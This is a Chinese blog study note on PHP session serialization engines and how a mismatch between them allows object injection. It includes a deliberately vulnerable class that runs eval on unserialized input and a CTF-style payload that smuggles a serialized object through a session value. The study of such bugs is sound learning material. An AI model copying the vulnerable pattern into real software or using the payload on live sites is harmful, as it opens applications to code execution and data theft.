end的学习反序列化存储和使用的引擎不一样(session.serialize_handler)

最新推荐文章于 2024-04-10 17:20:49 发布
最新推荐文章于 2024-04-10 17:20:49 发布
阅读量257 收藏
点赞数
分类专栏: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45781155/article/details/115677095
版权

session.serialize_handler

session.serialize_handler是用来设置session的序列话引擎的,除了默认的PHP引擎之外,还存在其他引擎,不同的引擎所对应的session的存储方式不相同。


    php_binary:存储方式是,键名的长度对应的ASCII字符+键名+经过serialize()函数序列化处理的值
    php:存储方式是,键名+竖线+经过serialize()函数序列处理的值
    php_serialize(php>5.5.4):存储方式是,经过serialize()函数序列化处理的值


<?php
ini_set('session.serialize_handler', 'php_serialize');
session_start();
?>

在php_serialize引擎下:

<?php
ini_set('session.serialize_handler', 'php_serialize');
session_start();
$_SESSION['name'] = 'spoock';
var_dump();
?>
// a:1:{s:4:"name";s:6:"spoock";}

在php_binary引擎下:

<?php
ini_set('session.serialize_handler', 'php_binary');
session_start();
$_SESSION['name'] = 'spoock';
var_dump();
?>
//names:6:"spoock";

在php引擎下:

<?php
session_start()
$_SESSION['name'] = 'spoock';
var_dump();
?>
//name|s:6:"spoock";

例:

<?php
class syclover{
        var $func="";
        function __construct() {
            $this->func = "phpinfo()";
        }
        function __wakeup(){
            eval($this->func);
        }
}
unserialize($_GET['a']);
?>

a=O:8:“syclover”:1:{s:4:“func”;s:14:“echo “spoock”;”;}
object(syclover)[1]
public ‘func’ => string ‘echo “spoock”;’ (length=14)

例:

 <!-un4.php--> 
<?php
// goto un42.php
ini_set('session.serialize_handler','php_serialize');
session_start();
if (isset($_GET['tryhackme'])){
$_SESSION['tryhackme'] = $_GET['tryhackme'];
} else {
show_source(__FILE__);
}
?> 

 <!-un42.php--> 
<?php
include "flag4.php"; 
ini_set('session.serialize_handler','php');
session_start();
class funny{
    public $a;
    function __destruct(){
        global $flag;
        echo $flag;
    }
}
show_source(__FILE__);
?>

payload:?tryhackme=|O:5:“funny”:1:{s:1:“a”;N;}
在PHP在反序列化存储的$_SESSION数据时使用的引擎和序列化使用的引擎不一样,会导致数据无法正确第反序列化。

ini_set('session.serialize_handler','php_serialize');
session_start();
if (isset($_GET['tryhackme']))
//会将|O:5:"funny":1:{s:1:"a";N;}构造成a:1:{s:6:"spoock";s:27:"|O:5:"funny":1:{s:1:"a";N;}";}

array(1) { [“spoock”]=> string(27) “|O:5:“funny”:1:{s:1:“a”;N;}” }

ini_set('session.serialize_handler','php');
//php引擎会以|作为作为key和value的分隔符,那么就会将a:1:{s:6:"spoock";s:27:"作为SESSION的key,将O:5:"funny":1:{s:1:"a";N;}";}作为value,

进行反序列化得到:
object(__PHP_Incomplete_Class)#1 (2) { ["__PHP_Incomplete_Class_Name"]=> string(5) “funny” [“a”]=> NULL }
存储机制

php中的session中的内容并不是放在内存中的,而是以文件的方式来存储的,存储方式就是由配置项session.save_handler来进行确定的,默认是以文件的方式存储。

<?php
session_start()
$_SESSION['name'] = 'spoock';
var_dump();
?>

参考:https://blog.spoock.com/2016/10/16/php-serialize-problem/

闲人end
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
5.1. PHP
Sumarua的博客
07-05 1万+
内容索引:5.1. PHP5.1.1. 后门5.1.1.1. php.ini构成的后门5.1.1.2. .user.ini文件构成的PHP后门5.1.2. 反序列化5.1.2.1. PHP序列化实现5.1.2.2. PHP反序列化漏洞5.1.2.3. 相关CVE5.1.2.3.1. CVE-2016-71245.1.3. Disable Functions5.1.3.1. 机制实现5.1.3.2. Bypass5.1.4. Open Basedir5.1.4.1. 机制实现5.1.5. 安全相关配置5.1.
php.ini配置文件参数中文说明文档【持续整理】
云度
09-22 929
php.ini配置文件参数中文说明文档【持续整理】 一、中文翻译php.ini配置文件 [PHP 5.0.4 php.ini-dist] ;;;;;;;;;; ;; 警告 ;; ;;;;;;;;;; ; 这是PHP新安装时的默认设置。默认设置适合于开发但是不适合正式应用。 ; 出于安全方面考虑,请在发布正式应用程序时使用php.ini-recommended ; 并且参考如下页面:http...
SESSION序列化机制
m0_49762339的博客
01-29 436
一、session.serialize_handler三种序列化方式 php_binary 键名的长度对应的ascii字符+键名+经过serialize()函数序列化后的值 php 键名+竖线(|)+经过serialize()函数处理过的值(默认) php_serialize 经过serialize()函数处理过的值,会将键名和值当作一个数组序列化 可以通过这个函数来设置当前页面的序列化方式:ini_set('session.serialize_handler','php_serialize'); 1.p
关于php的session.serialize_handler的问题
weixin_30345055的博客
10-05 762
前言 php的session信息是储存在文件中的 session.save_path="" 指定储存的路径 session.save_handler="" 指定储存时使用的函数(默认是file) session.auto_start boolen session.serialize_handler="" 定义序列化和反序列化的处理器的名字,默认是php(5.5.4后改为php_serialize)...
PHP学习session.serialize_handler
weixin_41339032的博客
07-10 403
php.ini中默认设置的为session.serialize_handler = php。 php5.5.4版本后需要修改为session.serialize_handler = php_serialize
php的session.serialize_handler
weixin_30437481的博客
10-18 290
php里面的session.serialize_handler用来设置php的session的序列化方式,默认值为php,及使用php的序列化与反序列化。 还有一个值为session.serialize_handler = wddx,序列化后的值为xml字符串。 igbinary是一个php扩展https://github.com/igbinary/igbinary,安装扩展之后 # Lo...
session共享,格式json,php不能简单的设置session.serialize_handler=json,目前只有php,wddx(xml),安装扩展后还有igbinary(二进制)...
weixin_30471561的博客
10-22 181
即使session_save_handler被自己的类或者方法重写,write与read的出入数据都还是被序列化的,而且被session序列化不是一般的序列化...还是不能解解决memcached保存session数据为json的格式。 貌似php_memcached扩展有个option是可以选择序列化方式的有json方式的选项,这个还没试过,就怕只有是test|s:4:"data"中右边的部分...
php.ini配置中文详解
m0_61248140的博客
03-17 1593
此指令描述了PHP注册GET, POST, Cookie, 环境 和 内置变量的顺序 (各自使用G, P, C, E 和 S , 一般使用 EGPCS 或 GPC). 注册使用从左往右的顺序, 新的值会覆盖旧的值.mysqli_connect()默认的端口号. 如果没有设置, mysql_connect() 会使用 $MYSQL_TCP_PORT。mysql_connect()默认的端口号. 如果没有设置, mysql_connect() 会使用 $MYSQL_TCP_PORT。
php.ini 中文详解
weixin_39440438的博客
12-17 709
php.ini 中文详解 [PHP] ;;;;;;;;;;;;;;;;;;;;;;; ; 关于 php.ini 配置文件 ; ;;;;;;;;;;;;;;;;;;;;;;; ; PHP 的初始化文件, 必须命名为 php.ini. ; 主要是用来负责PHP的配置. ; PHP 会尝试通过一些地址来寻找和加载配置. ; 比如有以下几种方式依次查找该文件: ; 1. SAPI . ; 2. 环境变...
【深度学习系列】用PaddlePaddle和Tensorflow实现经典CNN网络Vgg
简书博客搬家测试账号
05-09 249
感谢关注天善智能,走好数据之路↑↑↑欢迎关注天善智能,我们是专注于商业智能BI,人工智能AI,大数据分析与挖掘领域的垂直社区,学习,问答、求职一站式搞定!对商业智能BI、大数据分析挖掘、机器学习,python,R等数据领域感兴趣的同学加微信:tstoutiao,邀请你进入数据爱好者交流群,数据爱好者们都在这儿。上周我们讲了经典CNN网络AlexNet对图像分类的效果,20...
php反序列化代码,代码审计|PHP反序列化入门之session反序列化
weixin_29830873的博客
03-12 173
原标题:代码审计|PHP反序列化入门之session反序列化PHP的session机制在学习 session反序列化之前,我们需要了解这几个参数的含义。Directive含义session.save_handlersession保存形式。默认为filessession.save_pathsession保存路径。session.serialize_handlersession序列化存储所用处理器。默...
php session序列化,深入解析PHP中SESSION反序列化机制
weixin_34046298的博客
03-10 299
简介在php.ini中存在三项配置项:session.save_path="" --设置session存储路径session.save_handler=""--设定用户自定义存储函数,如果想使用PHP内置会话存储机制之外的可以使用本函数(数据库等方式)session.auto_start boolen --指定会话模块是否在请求开始时启动一个会话,默认为0不启动session.seria...
php-session反序列化
weixin_63231007的博客
12-30 1086
一篇对session反序列化原理的探索
php反序列化漏洞——session反序列化漏洞
m0_73756016的博客
03-31 1375
session在网络应用中称为“会话控制”,是服务器为了保存用户状态而创建的一个特殊的对象。简而言之,session就是一个对象,用于存储信息。
Php学习SESSION反序列化机制
qq_32506555的博客
10-20 784
在php.ini中存在三项配置项:   session.save_path="" --设置session存储路径   session.save_handler="" --设定用户自定义存储函数,如果想使用PHP语言内置会话存储机制之外的可以使用本函数(数据库等方式)   session.auto_start boolen --指定会话模块是否在请求开始时启动一个会话,默认为0不
php中session相关知识(目前了解部分)
最新发布
2301_79783285的博客
04-10 847
在PHP中,$_SESSION是一个特殊的预定义数组,用于存储跨多个页面(即在整个用户会话中)持久化的数据。与其他类型的数据不同,会话数据在页面加载时不会丢失,而会在服务器上保存到用户会话结束(即用户关闭浏览器或者经过一定时间未活动)。是PHP的会话配置选项,定义了会话数据序列化的方法。它是一个全局性质的存储方式,允许你为每个访问者创建一个独特的会话,并且这个会话可以保持一定时间的持久化状态。如果一个会话已经存在(例如,同一个用户在另一个页面已经开启了会话),这个函数将会使用现有的会话。
PHP session反序列化漏洞
weixin_39664643的博客
03-14 5505
PHP session反序列化漏洞 PHP session反序列化漏洞,就是当【序列化存储Session数据】与【反序列化读取Session数据】的方式不同导致session反序列化漏洞的产生 什么是session 官方Session定义:在计算机中,尤其是在网络应用中,称为“会话控制”。Session 对象存储特定用户会话所需的属性及配置信息。主要有以下特点: session保存的位置是在服务器端 session通常是要配合cookie使用 因为HTTP的无状态性,服务端产生了session来标识当前
PHP之序列化与反序列化session反序列化篇)
errorr0
04-04 2414
一个有意思的反序列化
好久没有写博客了,今天来一片php使用redis共享session
i saw you walking in the rain
01-25 2608
网上的php将session存放在redis的方法,大多数只是指出了如何存放,并没有涉及到如何存放json格式 我根据网上的资料,整理出自己的代码,使得session能够以json格式存放在redis里面,方便和其他语言的共享 <?php class RedisSessionHandler implements SessionHandlerInterface{ private $re
C#序列化与反序列化详解:BinaryFormatter、SoapFormatter和XmlSerializer
"本文深入解析了C#中的序列化与反序列化概念,涵盖了BinaryFormatter、SoapFormatter和XmlSerializer三种常见的序列化方式,并给出了使用BinaryFormatter进行串行化的示例代码。" C#序列化和反序列化是.NET框架中至...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值